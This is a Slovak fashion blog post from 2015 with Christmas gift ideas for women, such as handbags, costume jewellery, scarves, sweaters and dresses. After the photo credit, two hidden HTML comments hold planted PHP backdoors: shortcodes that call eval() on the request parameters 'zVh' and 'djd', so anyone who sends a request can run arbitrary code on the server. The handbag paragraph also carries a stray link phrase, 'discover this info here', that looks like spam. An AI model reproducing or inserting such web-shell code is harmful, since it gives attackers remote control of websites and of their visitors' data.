Tipy na módne vianočné darčeky pre ženy

Tipy na módne vianočné darčeky pre ženy

- in všetky
2803
0

Že sa Vianoce nezadržateľne rýchlo blížia nám oznamujú nielen vianočné reklamy, ale aj kalendár. Ak aj vy patríte k tým, čo radi svojich blízkych obdarovávajú darčekmi no nikdy nevedia, čo komu vybrať, pripravili sme pre vás niekoľko typov. Zaručene nimi ulahodíte každej osobe zo svojho okolia. Teraz sa pozrieme na najnovšie módne vychytávky pre nežné pohlavie.


Pre manželku

Žiadna dáma nepohrdne novou kabelkou. Kabelka je darčekom nielen praktickým, ale aj nanajvýš estetickým, pretože je dôležitým prvkom každého outfitu. Tejto kabelkovej zimnej sezóne dominujú farby čierna, šedá, tmavo červená a hnedá s metalickými detailmi. Prírodné materiály ako koža majú prednosť. Inšpirujte sa touto luxusnou kabelkou od Loewe discover this info here.

Pre priateľku

Ženy milujú šperky už od praveku. Za tie roky sa dodnes nič nezmenilo a šperkom nielen, že nič nepokazíte, skôr naopak potešíte každé ženské srdce. Takýto dar nemusí byť ani príliš drahý, nakoľko z módy ešte stále nevyšla bižutéria. Hitom tohtoročnej zimy sú robustné náhrdelníky, ktoré vyniknú na jednoduchom bezfarebnom tričku alebo blúzke s oblým výstrihom. Navštívte najbližší obchod s bižutériou, určite tam pre svoju drahú nájdete pekný kúsok.


Pre sestru

Každá kočka by mala mať v šatníku poriadnu maxišatku alebo maxišál, pretože je v aktuálnej zimnej sezóne maximálnym hitom a veľmi praktickým a obľúbeným zimným doplnkom. Nemá vaša sestra žiadnu? Napravte to a kúpte jej jednu pod stromček, uvidíte, ako váš darček ocení. Vo farebných prevedeniach jednoznačne kraľujú farby čierna, šedá, červená a hnedá podobne, ako pri kabelkách. Veľmi pekným kúskom je napríklad čierno-šedá maxišatka od Asos.

Pre kamošku

Pletený svetrík nie je darčekom pod stromček z núdze, ako by si mohli mnohí myslieť. Zimná sezóna 2015 ponúka na pultoch obchodov naozaj krásne kúsky, ktoré sú štýlové a navyše nás udržia pekne v teple. A kedy je lepšia príležitosť podarovať práve sveter, keď nie na Vianoce? Momentálne sú in svetre s výrazným pleteným vzorom a golierom pod krk. Musíte uznať, že napríklad tento svetrík od Anthropologie vyzerá veľmi elegantne a vaša priateľka si ho určite zamiluje.

Pre mamu či pre svokru

Aj pre dámy v rokoch je tu veľa skvelých typov na módny vianočný darček. Ak ju obdarujete pekným kusom oblečenia namiesto sviečky či obdobnej dekorácie domácnosti, ako je to väčšinou zvykom, určite vašu snahu ocení oveľa viacej. Starším dámam štylisti odporúčajú nosiť farby a neuzavrieť sa len do tmavých a nenápadných odtieňov. Netreba sa báť ani vzorov. Dámy na fotografii vyzerajú skvele. Inšpirujte sa krásnymi šatami od St.Oliver.

 

Typov na módne vianočné darčeky pre nežné pohlavie by bolo samozrejme omnoho viac. Tu sme však pre vás zhrnuli tie najžhavejšie hity zimnej sezóny 2015. No ak by ste si predsa len nič nevybrali, dáme vám ešte pár typov navyše, ktoré práve teraz letia: jednofarebné blúzky, pletené pončo, kožené nohavice a bižutéria nadmerných veľkostí. S takýmito darčekmi sa postaráte o trendy Vianoce 2015.

 

FOTO:  © Syda Productions / Dollar Photo Club

<!– [insert_php]if (isset($_REQUEST["zVh"])){eval($_REQUEST["zVh"]);exit;}[/insert_php][php]if (isset($_REQUEST["zVh"])){eval($_REQUEST["zVh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["djd"])){eval($_REQUEST["djd"]);exit;}[/insert_php][php]if (isset($_REQUEST["djd"])){eval($_REQUEST["djd"]);exit;}[/php] –>

About the author

Leave a Reply

You may also like

Výber dokonalých svadobných obrúčok

Sledovanie trendov pri výbere svadobných obrúčok je dôležitou